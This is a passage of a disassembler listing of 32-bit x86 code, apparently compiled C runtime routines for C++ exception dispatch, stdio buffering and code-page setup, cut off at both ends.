mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41A39F: ; CODE XREF: sub_41A384+C�j
pop esi
retn
sub_41A384 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A3A1 proc near ; CODE XREF: sub_41A6C4+52�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0041A4DB SIZE 00000003 BYTES
push 40h
push offset stru_429528
call __SEH_prolog
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_20], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_2C]
push eax
call sub_4157DA
pop ecx
pop ecx
mov [ebp+var_30], eax
call sub_416E15
mov eax, [eax+78h]
mov [ebp+var_34], eax
call sub_416E15
mov eax, [eax+7Ch]
mov [ebp+var_38], eax
call sub_416E15
mov [eax+78h], esi
call sub_416E15
mov ecx, [ebp+arg_8]
mov [eax+7Ch], ecx
and [ebp+ms_exc.disabled], 0
mov [ebp+ms_exc.disabled], 1
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_41586F
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp loc_41A4C9
; ---------------------------------------------------------------------------
loc_41A426: ; DATA XREF: .rdata:00429538�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41A45E
mov eax, [ebp+var_3C]
cmp dword ptr [eax+10h], 3
jnz short loc_41A45E
mov eax, [ebp+var_3C]
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41A45E
mov eax, [ebp+var_3C]
cmp dword ptr [eax+1Ch], 0
mov [ebp+var_40], 1
jz short loc_41A465
loc_41A45E: ; CODE XREF: sub_41A3A1+96�j
; sub_41A3A1+9F�j ...
mov [ebp+var_40], 0
loc_41A465: ; CODE XREF: sub_41A3A1+BB�j
mov eax, [ebp+var_40]
retn
; ---------------------------------------------------------------------------
loc_41A469: ; DATA XREF: .rdata:0042953C�o
mov esp, [ebp+ms_exc.old_esp]
mov ecx, [ebp+arg_C]
mov eax, [ecx+8]
mov [ebp+var_44], eax
mov edi, [ebp+arg_4]
mov eax, [edi+8]
mov [ebp+var_48], eax
mov edx, [ecx+10h]
mov [ebp+var_4C], edx
xor edx, edx
loc_41A486: ; CODE XREF: sub_41A3A1+13B�j
mov [ebp+var_50], edx
cmp edx, [ecx+0Ch]
jnb short loc_41A4B2
lea esi, [edx+edx*4]
mov ebx, [ebp+var_4C]
lea esi, [ebx+esi*4]
mov ebx, [esi+4]
cmp eax, ebx
jle short loc_41A4DB
cmp eax, [esi+8]
jg short loc_41A4DB
lea eax, [ebx+1]
mov [ebp+var_48], eax
mov edx, [ebp+var_44]
mov eax, [edx+eax*8]
mov [ebp+var_48], eax
loc_41A4B2: ; CODE XREF: sub_41A3A1+EB�j
push eax
push ecx
xor esi, esi
push esi
push edi
call sub_41A271
add esp, 10h
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov esi, [ebp+arg_0]
loc_41A4C9: ; CODE XREF: sub_41A3A1+80�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A4E4
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41A3A1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41A3A1
loc_41A4DB: ; CODE XREF: sub_41A3A1+FB�j
; sub_41A3A1+100�j
inc edx
jmp short loc_41A486
; END OF FUNCTION CHUNK FOR sub_41A3A1
; =============== S U B R O U T I N E =======================================
sub_41A4DE proc near ; DATA XREF: .rdata:stru_429528�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_41A4DE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A4E4 proc near ; CODE XREF: sub_41A3A1+12C�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-30h]
call sub_415823
pop ecx
call sub_416E15
mov ecx, [ebp-34h]
mov [eax+78h], ecx
call sub_416E15
mov ecx, [ebp-38h]
mov [eax+7Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_41A547
cmp dword ptr [esi+10h], 3
jnz short locret_41A547
cmp dword ptr [esi+14h], 19930520h
jnz short locret_41A547
cmp dword ptr [ebp-20h], 0
jnz short locret_41A547
cmp dword ptr [ebp-1Ch], 0
jz short locret_41A547
push dword ptr [esi+18h]
call sub_415802
pop ecx
test eax, eax
jz short locret_41A547
call sub_415A1A
push eax
push esi
call sub_41A33F
pop ecx
pop ecx
locret_41A547: ; CODE XREF: sub_41A4E4+2B�j
; sub_41A4E4+31�j ...
retn
sub_41A4E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A548 proc near ; CODE XREF: sub_41A6C4+D�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 8
push offset stru_429540
call __SEH_prolog
mov esi, ecx
mov eax, [ebp+arg_4]
mov edi, edx
mov ebx, [ebp+arg_0]
mov ecx, [eax+4]
test ecx, ecx
jz loc_41A6B2
cmp byte ptr [ecx+8], 0
jz loc_41A6B2
mov ecx, [eax+8]
test ecx, ecx
jnz short loc_41A584
test byte ptr [eax+3], 80h
jz loc_41A6B2
loc_41A584: ; CODE XREF: sub_41A548+30�j
mov eax, [eax]
test eax, eax
js short loc_41A58E
lea edi, [ecx+edi+0Ch]
loc_41A58E: ; CODE XREF: sub_41A548+40�j
and [ebp+ms_exc.disabled], 0
push 1
push dword ptr [ebx+18h]
test al, 8
jz short loc_41A5D0
call sub_41E375
pop ecx
pop ecx
test eax, eax
jz loc_41A6A9
push 1
push edi
call sub_41E391
pop ecx
pop ecx
test eax, eax
jz loc_41A6A9
mov eax, [ebx+18h]
mov [edi], eax
loc_41A5C1: ; CODE XREF: sub_41A548+D1�j
lea ecx, [esi+8]
call sub_41A384
mov [edi], eax
jmp loc_41A6AE
; ---------------------------------------------------------------------------
loc_41A5D0: ; CODE XREF: sub_41A548+51�j
test byte ptr [esi], 1
jz short loc_41A61B
call sub_41E375
pop ecx
pop ecx
test eax, eax
jz loc_41A6A9
push 1
push edi
call sub_41E391
pop ecx
pop ecx
test eax, eax
jz loc_41A6A9
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_41D220
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41A6AE
mov eax, [edi]
test eax, eax
jz loc_41A6AE
jmp short loc_41A5C1
; ---------------------------------------------------------------------------
loc_41A61B: ; CODE XREF: sub_41A548+8B�j
cmp dword ptr [esi+18h], 0
jnz short loc_41A654
call sub_41E375
pop ecx
pop ecx
test eax, eax
jz short loc_41A6A9
push 1
push edi
call sub_41E391
pop ecx
pop ecx
test eax, eax
jz short loc_41A6A9
push dword ptr [esi+14h]
lea ecx, [esi+8]
mov eax, [ebx+18h]
call sub_41A384
push eax
push edi
call sub_41D220
add esp, 0Ch
jmp short loc_41A6AE
; ---------------------------------------------------------------------------
loc_41A654: ; CODE XREF: sub_41A548+D7�j
call sub_41E375
pop ecx
pop ecx
test eax, eax
jz short loc_41A6A9
push 1
push edi
call sub_41E391
pop ecx
pop ecx
test eax, eax
jz short loc_41A6A9
push dword ptr [esi+18h]
call sub_41E3AD
pop ecx
test eax, eax
jz short loc_41A6A9
mov eax, [ebx+18h]
lea ecx, [esi+8]
test byte ptr [esi], 4
jz short loc_41A698
push 1
call sub_41A384
push eax
push dword ptr [esi+18h]
push edi
call sub_41563C
jmp short loc_41A6AE
; ---------------------------------------------------------------------------
loc_41A698: ; CODE XREF: sub_41A548+13B�j
call sub_41A384
push eax
push dword ptr [esi+18h]
push edi
call sub_41563C
jmp short loc_41A6AE
; ---------------------------------------------------------------------------
loc_41A6A9: ; CODE XREF: sub_41A548+5C�j
; sub_41A548+6E�j ...
call sub_41AAA4
loc_41A6AE: ; CODE XREF: sub_41A548+83�j
; sub_41A548+C1�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41A6B2: ; CODE XREF: sub_41A548+1B�j
; sub_41A548+25�j ...
call __SEH_epilog
retn
sub_41A548 endp
; =============== S U B R O U T I N E =======================================
sub_41A6B8 proc near ; DATA XREF: .rdata:stru_429540�o
xor eax, eax
inc eax
retn
sub_41A6B8 endp
; ---------------------------------------------------------------------------
loc_41A6BC: ; DATA XREF: .rdata:stru_429540�o
mov esp, [ebp-18h]
jmp sub_41AA6F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6C4 proc near ; CODE XREF: sub_41A72B+A2�p
; sub_41A7EB+17D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
test ecx, ecx
jz short loc_41A6D8
push ebx
push [ebp+arg_0]
mov edx, esi
call sub_41A548
pop ecx
pop ecx
loc_41A6D8: ; CODE XREF: sub_41A6C4+5�j
cmp [ebp+arg_14], 0
push [ebp+arg_0]
jnz short loc_41A6E4
push esi
jmp short loc_41A6E7
; ---------------------------------------------------------------------------
loc_41A6E4: ; CODE XREF: sub_41A6C4+1B�j
push [ebp+arg_14]
loc_41A6E7: ; CODE XREF: sub_41A6C4+1E�j
call sub_415643
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_41A271
mov eax, [edi+4]
push 100h
push [ebp+arg_10]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_41A3A1
add esp, 28h
test eax, eax
jz short loc_41A729
push esi
push eax
call sub_41560C
loc_41A729: ; CODE XREF: sub_41A6C4+5C�j
pop ebp
retn
sub_41A6C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A72B proc near ; CODE XREF: sub_41A7EB+1D3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_41A7E8
call sub_416E15
cmp dword ptr [eax+74h], 0
jz short loc_41A76A
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4158C0
add esp, 1Ch
test eax, eax
jnz short loc_41A7E8
loc_41A76A: ; CODE XREF: sub_41A72B+1E�j
mov esi, [ebp+arg_14]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_415760
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_41A7E7
push ebx
loc_41A790: ; CODE XREF: sub_41A72B+B9�j
cmp esi, [edi]
jl short loc_41A7D8
cmp esi, [edi+4]
jg short loc_41A7D8
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41A7B1
cmp byte ptr [ecx+8], 0
jnz short loc_41A7D8
loc_41A7B1: ; CODE XREF: sub_41A72B+7E�j
mov esi, [ebp+arg_4]
push 1
push [ebp+arg_1C]
lea ebx, [eax-10h]
push [ebp+arg_18]
xor ecx, ecx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_41A6C4
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_41A7D8: ; CODE XREF: sub_41A72B+67�j
; sub_41A72B+6C�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_41A790
pop ebx
loc_41A7E7: ; CODE XREF: sub_41A72B+62�j
pop edi
loc_41A7E8: ; CODE XREF: sub_41A72B+F�j
; sub_41A72B+3D�j
pop esi
leave
retn
sub_41A72B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A7EB proc near ; CODE XREF: sub_41A9CD+93�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_4]
mov eax, [eax+8]
and byte ptr [ebp+var_1C], 0
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jl short loc_41A80B
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41A810
loc_41A80B: ; CODE XREF: sub_41A7EB+16�j
call sub_41AAA4
loc_41A810: ; CODE XREF: sub_41A7EB+1E�j
push ebx
mov ebx, [ebp+arg_0]
cmp dword ptr [ebx], 0E06D7363h
push esi
push edi
jnz loc_41A9A2
cmp dword ptr [ebx+10h], 3
mov edi, 19930520h
jnz short loc_41A89C
cmp [ebx+14h], edi
jnz short loc_41A89C
cmp dword ptr [ebx+1Ch], 0
jnz short loc_41A89C
call sub_416E15
cmp dword ptr [eax+78h], 0
jz loc_41A99A
call sub_416E15
mov esi, [eax+78h]
mov [ebp+arg_0], esi
call sub_416E15
mov eax, [eax+7Ch]
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_1C], 1
call sub_41E375
test eax, eax
pop ecx
pop ecx
jnz short loc_41A874
call sub_41AAA4
loc_41A874: ; CODE XREF: sub_41A7EB+82�j
cmp dword ptr [esi], 0E06D7363h
jnz loc_41A99F
mov eax, [ebp+arg_0]
cmp dword ptr [eax+10h], 3
jnz short loc_41A899
cmp [eax+14h], edi
jnz short loc_41A899
cmp dword ptr [eax+1Ch], 0
jnz short loc_41A899
call sub_41AAA4
loc_41A899: ; CODE XREF: sub_41A7EB+9C�j
; sub_41A7EB+A1�j ...
mov ebx, [ebp+arg_0]
loc_41A89C: ; CODE XREF: sub_41A7EB+40�j
; sub_41A7EB+45�j ...
cmp dword ptr [ebx], 0E06D7363h
jnz loc_41A9A2
cmp dword ptr [ebx+10h], 3
jnz loc_41A9A2
cmp [ebx+14h], edi
jnz loc_41A9A2
mov esi, [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_8]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_415760
mov ecx, [ebp+var_8]
add esp, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jnb loc_41A98A
jmp short loc_41A8E9
; ---------------------------------------------------------------------------
loc_41A8E6: ; CODE XREF: sub_41A7EB+199�j
mov esi, [ebp+var_18]
loc_41A8E9: ; CODE XREF: sub_41A7EB+F9�j
cmp [eax], esi
jg loc_41A975
cmp esi, [eax+4]
jg short loc_41A975
mov ecx, [eax+0Ch]
test ecx, ecx
mov esi, [eax+10h]
mov [ebp+var_14], ecx
jle short loc_41A975
loc_41A903: ; CODE XREF: sub_41A7EB+15B�j
mov ecx, [ebx+1Ch]
mov ecx, [ecx+0Ch]
lea edx, [ecx+4]
mov ecx, [ecx]
test ecx, ecx
mov [ebp+var_C], edx
mov [ebp+var_10], ecx
jle short loc_41A93C
loc_41A918: ; CODE XREF: sub_41A7EB+14C�j
mov eax, [ebp+var_C]
mov edi, [eax]
push dword ptr [ebx+1Ch]
mov [ebp+var_24], edi
call sub_41A204
test eax, eax
pop ecx
jnz short loc_41A94A
dec [ebp+var_10]
add [ebp+var_C], 4
cmp [ebp+var_10], eax
jg short loc_41A918
mov eax, [ebp+var_4]
loc_41A93C: ; CODE XREF: sub_41A7EB+12B�j
dec [ebp+var_14]
add esi, 10h
cmp [ebp+var_14], 0
jg short loc_41A903
jmp short loc_41A975
; ---------------------------------------------------------------------------
loc_41A94A: ; CODE XREF: sub_41A7EB+140�j
push [ebp+var_1C]
mov edi, [ebp+var_4]
push [ebp+arg_1C]
mov ecx, [ebp+var_24]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
mov ebx, esi
mov esi, [ebp+arg_4]
call sub_41A6C4
mov ebx, [ebp+arg_0]
add esp, 1Ch
mov eax, edi
loc_41A975: ; CODE XREF: sub_41A7EB+100�j
; sub_41A7EB+109�j ...
inc [ebp+var_8]
mov ecx, [ebp+var_8]
add eax, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jb loc_41A8E6
loc_41A98A: ; CODE XREF: sub_41A7EB+F3�j
cmp [ebp+arg_14], 0
jz short loc_41A99A
push 1
push ebx
call sub_41A33F
pop ecx
pop ecx
loc_41A99A: ; CODE XREF: sub_41A7EB+56�j
; sub_41A7EB+1A3�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41A99F: ; CODE XREF: sub_41A7EB+8F�j
mov ebx, [ebp+arg_0]
loc_41A9A2: ; CODE XREF: sub_41A7EB+31�j
; sub_41A7EB+B7�j ...
cmp [ebp+arg_14], 0
jnz short loc_41A9C8
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41A72B
add esp, 20h
jmp short loc_41A99A
; ---------------------------------------------------------------------------
loc_41A9C8: ; CODE XREF: sub_41A7EB+1BB�j
jmp sub_41AA6F
sub_41A7EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9CD proc near ; CODE XREF: .text:004156B6�p
; .text:004156E6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
push edi
and eax, 1FFFFFFFh
mov edi, 19930520h
cmp eax, edi
jz short loc_41A9EA
call sub_41AAA4
loc_41A9EA: ; CODE XREF: sub_41A9CD+16�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41AA12
cmp dword ptr [esi+4], 0
jz short loc_41AA68
cmp [ebp+arg_14], 0
jnz short loc_41AA68
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41A271
add esp, 10h
jmp short loc_41AA68
; ---------------------------------------------------------------------------
loc_41AA12: ; CODE XREF: sub_41A9CD+24�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41AA68
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41AA4C
cmp [eax+14h], edi
jbe short loc_41AA4C
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41AA4C
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41AA6B
; ---------------------------------------------------------------------------
loc_41AA4C: ; CODE XREF: sub_41A9CD+51�j
; sub_41A9CD+56�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41A7EB
add esp, 20h
loc_41AA68: ; CODE XREF: sub_41A9CD+2A�j
; sub_41A9CD+30�j ...
xor eax, eax
inc eax
loc_41AA6B: ; CODE XREF: sub_41A9CD+7D�j
pop edi
pop esi
pop ebp
retn
sub_41A9CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA6F proc near ; CODE XREF: sub_41A253+19�j
; .text:0041A37F�j ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041E3C5 SIZE 00000018 BYTES
push 8
push offset stru_429550
call __SEH_prolog
call sub_416E15
cmp dword ptr [eax+6Ch], 0
jz short loc_41AA9F
and [ebp+ms_exc.disabled], 0
call sub_416E15
call dword ptr [eax+6Ch]
jmp short loc_41AA9B
; ---------------------------------------------------------------------------
loc_41AA94: ; DATA XREF: .rdata:stru_429550�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41AA98: ; DATA XREF: .rdata:stru_429550�o
mov esp, [ebp+ms_exc.old_esp]
loc_41AA9B: ; CODE XREF: sub_41AA6F+23�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41AA9F: ; CODE XREF: sub_41AA6F+15�j
jmp loc_41E3C5
sub_41AA6F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AAA4 proc near ; CODE XREF: sub_415760+23�p
; sub_415760:loc_4157CA�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset stru_429560
call __SEH_prolog
mov eax, off_42DEB0
test eax, eax
jz short loc_41AACC
and [ebp+ms_exc.disabled], 0
call eax ; sub_41AA6F
jmp short loc_41AAC8
; ---------------------------------------------------------------------------
loc_41AAC1: ; DATA XREF: .rdata:stru_429560�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41AAC5: ; DATA XREF: .rdata:stru_429560�o
mov esp, [ebp+ms_exc.old_esp]
loc_41AAC8: ; CODE XREF: sub_41AAA4+1B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41AACC: ; CODE XREF: sub_41AAA4+13�j
jmp sub_41AA6F
sub_41AAA4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AAE0 proc near ; CODE XREF: sub_41586F+3D�p
; sub_41A271+68�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_415A3D
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41AB1F
mov ecx, 2
loc_41AB1F: ; CODE XREF: sub_41AAE0+38�j
push ecx
call sub_415A3D
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41AAE0 endp
; =============== S U B R O U T I N E =======================================
sub_41AB2C proc near ; CODE XREF: sub_415CAF+1E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41C1CF
test eax, eax
pop ecx
jz short loc_41ABB0
cmp esi, offset dword_42D998
jnz short loc_41AB4A
xor eax, eax
jmp short loc_41AB55
; ---------------------------------------------------------------------------
loc_41AB4A: ; CODE XREF: sub_41AB2C+18�j
cmp esi, offset dword_42D9B8
jnz short loc_41ABB0
xor eax, eax
inc eax
loc_41AB55: ; CODE XREF: sub_41AB2C+1C�j
inc dword_47C200
test word ptr [esi+0Ch], 10Ch
jnz short loc_41ABB0
push ebx
push edi
lea edi, ds:47C364h[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_41AB96
push ebx
call sub_414E7D
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_41AB96
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_41ABA3
; ---------------------------------------------------------------------------
loc_41AB96: ; CODE XREF: sub_41AB2C+48�j
; sub_41AB2C+55�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_41ABA3: ; CODE XREF: sub_41AB2C+68�j
or word ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41ABB0: ; CODE XREF: sub_41AB2C+10�j
; sub_41AB2C+24�j ...
xor eax, eax
pop esi
retn
sub_41AB2C endp
; =============== S U B R O U T I N E =======================================
sub_41ABB4 proc near ; CODE XREF: sub_415CAF+3A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_41ABDD
push esi
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41ABDC
push esi
call sub_417DD2
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_41ABDC: ; CODE XREF: sub_41ABB4+10�j
pop esi
locret_41ABDD: ; CODE XREF: sub_41ABB4+5�j
retn
sub_41ABB4 endp
; =============== S U B R O U T I N E =======================================
sub_41ABDE proc near ; CODE XREF: sub_41AE37+FF�p
; sub_41AE37+149�p
sub eax, 3A4h
jz short loc_41AC07
sub eax, 4
jz short loc_41AC01
sub eax, 0Dh
jz short loc_41ABFB
dec eax
jz short loc_41ABF5
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41ABF5: ; CODE XREF: sub_41ABDE+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41ABFB: ; CODE XREF: sub_41ABDE+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41AC01: ; CODE XREF: sub_41ABDE+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41AC07: ; CODE XREF: sub_41ABDE+5�j
mov eax, 411h
retn
sub_41ABDE endp
; =============== S U B R O U T I N E =======================================
sub_41AC0D proc near ; CODE XREF: sub_41AE37:loc_41AFAC�p
push edi
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_47C740
rep stosd
stosb
xor eax, eax
mov dword_47C844, eax
mov dword_47C728, eax
mov dword_47C720, eax
mov edi, offset word_47C850
stosd
stosd
stosd
pop edi
retn
sub_41AC0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AC36 proc near ; CODE XREF: sub_41AE37:loc_41AFB1�p
var_518 = word ptr -518h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_18 = byte ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov eax, dword_42DEA8
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_18]
push eax
push dword_47C844
call ds:dword_4201B0 ; GetCPInfo
cmp eax, 1
mov esi, 100h
jnz loc_41AD76
xor eax, eax
loc_41AC6B: ; CODE XREF: sub_41AC36+3F�j
mov [ebp+eax+var_118], al
inc eax
cmp eax, esi
jb short loc_41AC6B
mov al, [ebp+var_12]
test al, al
mov [ebp+var_118], 20h
jz short loc_41ACBB
push ebx
lea edx, [ebp+var_11]
push edi
loc_41AC8A: ; CODE XREF: sub_41AC36+81�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41ACB1
sub ecx, eax
inc ecx
mov ebx, ecx
shr ecx, 2
lea edi, [ebp+eax+var_118]
mov eax, 20202020h
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41ACB1: ; CODE XREF: sub_41AC36+5C�j
inc edx
mov al, [edx]
inc edx
test al, al
jnz short loc_41AC8A
pop edi
pop ebx
loc_41ACBB: ; CODE XREF: sub_41AC36+4D�j
push 0
push dword_47C720
lea eax, [ebp+var_518]
push dword_47C844
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 1
call sub_41C5B0
push 0
push dword_47C844
lea eax, [ebp+var_218]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push esi
push dword_47C720
call sub_419E09
push 0
push dword_47C844
lea eax, [ebp+var_318]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 200h
push dword_47C720
call sub_419E09
add esp, 5Ch
xor eax, eax
loc_41AD30: ; CODE XREF: sub_41AC36+13C�j
mov cx, [ebp+eax*2+var_518]
test cl, 1
jz short loc_41AD53
or byte_47C741[eax], 10h
mov cl, [ebp+eax+var_218]
loc_41AD4B: ; CODE XREF: sub_41AC36+130�j
mov byte_47C860[eax], cl
jmp short loc_41AD6F
; ---------------------------------------------------------------------------
